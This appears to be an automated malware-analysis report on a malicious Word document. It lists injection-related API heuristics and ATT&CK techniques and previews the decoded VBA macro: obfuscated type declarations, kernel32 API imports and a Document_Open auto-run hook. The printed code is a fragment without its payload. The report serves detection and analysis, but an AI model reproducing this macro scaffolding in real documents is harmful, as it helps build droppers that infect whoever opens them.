MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing a VBA macro that executes upon opening. The macro references Windows API functions such as CreateProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread, indicating an attempt to load and execute a second-stage payload. The presence of Document_Open macro and references to LoadLibrary and GetProcAddress further support this. The exact payload and its destination are not directly discernible from the provided evidence.
Heuristics 9
-
Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORYReference to WriteProcessMemory API
-
Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREADReference to CreateRemoteThread API
-
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1397 bytes |
SHA-256: f3235698e42443cca044e7e14e3a8340a4f0deca1df95811e4aa86316af114f8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Type PROC
ZEnRYEL As Long
mhhsUzo As Long
cACtzcH As Long
ChnpYwt As Long
End Type
Private Type INFO
ppFnQhc As Long
cACtzcH As String
ZLSaait As String
iSeyHpq As String
AhBCTbE As Long
JCSZRqE As Long
GvjZtDZ As Long
DlAXgbr As Long
MokGgKj As Long
hbCYiGg As Long
parRilo As Long
UXaPWID As Long
dSYmUJX As Integer
YWNZiiS As Integer
vljwxCW As Long
xChGlfJ As Long
itwVpab As Long
qqJmWHg As Long
End Type
#If VBA7 Then
Private Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Private Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
#Else
Private Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
#End If
Sub Document_Open()
Call Eiebv
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.